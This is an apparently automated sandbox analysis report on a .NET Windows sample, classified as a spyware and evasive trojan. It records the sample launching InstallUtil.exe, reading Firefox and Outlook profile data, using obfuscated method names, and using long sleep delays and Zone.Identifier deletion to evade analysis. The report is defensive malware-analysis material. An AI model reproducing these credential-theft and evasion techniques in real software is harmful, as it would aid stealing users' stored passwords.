Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078CC1D8 | 0_2_078CC1D8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C1820 | 0_2_078C1820
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C8BA8 | 0_2_078C8BA8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C8BB8 | 0_2_078C8BB8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C23CF | 0_2_078C23CF
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C23D0 | 0_2_078C23D0
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C13F0 | 0_2_078C13F0
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C0B10 | 0_2_078C0B10
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C0B20 | 0_2_078C0B20
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C4B4A | 0_2_078C4B4A
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C5B58 | 0_2_078C5B58
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C5B68 | 0_2_078C5B68
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C661A | 0_2_078C661A
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C0E10 | 0_2_078C0E10
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C1668 | 0_2_078C1668
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C1678 | 0_2_078C1678
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C11B9 | 0_2_078C11B9
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C9DB0 | 0_2_078C9DB0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C11C80_2_078C11C8
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078CA5180_2_078CA518
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C00070_2_078C0007
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C14000_2_078C1400
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C18100_2_078C1810
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_078C00400_2_078C0040
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07E44C780_2_07E44C78
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07E44C680_2_07E44C68
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_07E4EBF00_2_07E4EBF0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_08234A580_2_08234A58
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082306E00_2_082306E0
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082545600_2_08254560
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082500060_2_08250006
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082500400_2_08250040
                        Source: C:\Users\user\Desktop\Xc501VOacR.exeCode function: 0_2_082545350_2_08254535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_010940F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_01094D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_01094438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_01091CB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_066D6D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_066D4188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_066D2200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_067596A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_06750040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0675C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_067564F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_06759E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_06753AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_06750007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_06753AA8
Source: Xc501VOacR.exe, 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2692688876.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000000.2026333033.000000000066E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameu7df.exe@ vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenTableApp.dll> vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2705489747.0000000007860000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs Xc501VOacR.exe
Source: Xc501VOacR.exe, 00000000.00000002.2694977464.000000000313B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs Xc501VOacR.exe
Source: Xc501VOacR.exe | Binary or memory string: OriginalFilenameu7df.exe@ vs Xc501VOacR.exe
Source: Xc501VOacR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Xc501VOacR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Xc501VOacR.exe, Wd60Z.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Xc501VOacR.exe.3f9778a.1.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
Source: C:\Users\user\Desktop\Xc501VOacR.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xc501VOacR.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: Xc501VOacR.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Xc501VOacR.exe | ReversingLabs: Detection: 73%
Source: unknown | Process created: C:\Users\user\Desktop\Xc501VOacR.exe "C:\Users\user\Desktop\Xc501VOacR.exe"
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Xc501VOacR.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Xc501VOacR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Xc501VOacR.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match | File source: 0.2.Xc501VOacR.exe.5550000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.40a5470.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.40a5470.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.5550000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.403e2ba.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Xc501VOacR.exe.4068598.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Xc501VOacR.exe PID: 2228, type: MEMORYSTR
Source: Xc501VOacR.exe, n7QYq.cs | .Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CD8AB0 push eax; iretd | 0_2_02CD9039
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CDCA30 push 4C0529FCh; ret | 0_2_02CDCB15
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0535C409 push eax; retf | 0_2_0535C40A
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_05355049 push esp; retf | 0_2_0535504A
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0601E018 push eax; retn 05A4h | 0_2_0601E0C1
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_07477733 push edi; ret | 0_2_0747792E
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747A3ED push ds; retf 0040h | 0_2_0747A43E
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747793C push eax; ret | 0_2_0747796D
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0823D44F push ecx; retf EFCDh | 0_2_0823D5BA
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0825D07C pushad ; retf | 0_2_0825D0D5
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0825A1A9 push ecx; retf 0046h | 0_2_0825A1CA
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0825F1D8 push eax; iretd | 0_2_0825F22E
Source: Xc501VOacR.exe | Static PE information: section name: .text entropy: 7.180225181330332
Source: Xc501VOacR.exe, y5C3J.cs | High entropy of concatenated method names: 's5NAg', 'f7A0E', 'e7G1Y', 'n8ESx', 'Kb02T', 'Ts8z4', 'Wp75Y', 'i9FCk', 'Mf5p2', 'Jb56H'
Source: Xc501VOacR.exe, Yp19F.cs | High entropy of concatenated method names: 'm8LRw', 'Xq43C', 'Zw8t3', 'Zq3i2', 'i9A3P', 'z3Y2H', 'd6J5T', 'y4K5E', 'Rm1e6', 'c6R0D'
Source: Xc501VOacR.exe, Wd60Z.cs | High entropy of concatenated method names: 'Yz6q4', 'b1X4S', 'Cr74A', 'Sc04N', 'n7C4T', 'f6E2N', 'Le8q7', 'o1YBn', 'Qb01Z', 'd5WDy'
Source: Xc501VOacR.exe, p6Y1.cs | High entropy of concatenated method names: 'r7C8', 'Lg01', 'e2GM', 'j4JA', 'q2A0', 'Hp60', 'Sr9p', 'w0E9', 'Qb26', 'An92'

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Xc501VOacR.exe | File opened: C:\Users\user\Desktop\Xc501VOacR.exe\:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: Yara match, File source: Process Memory Space: Xc501VOacR.exe PID: 2228, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: 2BE0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: 2DF0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: 2BE0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: 8390000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: 9390000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: 9560000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: A560000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: A900000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: B900000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Memory allocated: C900000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Memory allocated: 1090000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Memory allocated: 2D50000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Memory allocated: 13B0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599875
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599766
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599656
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599547
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599313
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599203
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 599094
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598969
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 598110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597360
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 597110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596985
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596621
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596391
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596266
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596157
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 596032
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595907
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595688
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595313
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595188
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 595078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 594969
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 594844
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 594735
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 594610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 594485
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Thread delayed: delay time: 594360
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Window / User API: threadDelayed 7350
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe, Window / User API: threadDelayed 2487
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Window / User API: threadDelayed 1026
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Window / User API: threadDelayed 8805
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe TID: 1476, Thread sleep time: -33204139332677172s >= -30000s
                        Source: C:\Users\user\Desktop\Xc501VOacR.exe TID: 1476, Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7128, Thread sleep count: 1026 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7128, Thread sleep count: 8805 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep count: 31 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -28592453314249787s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599766s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599656s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599547s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836, Thread sleep time: -599438s >= -30000s
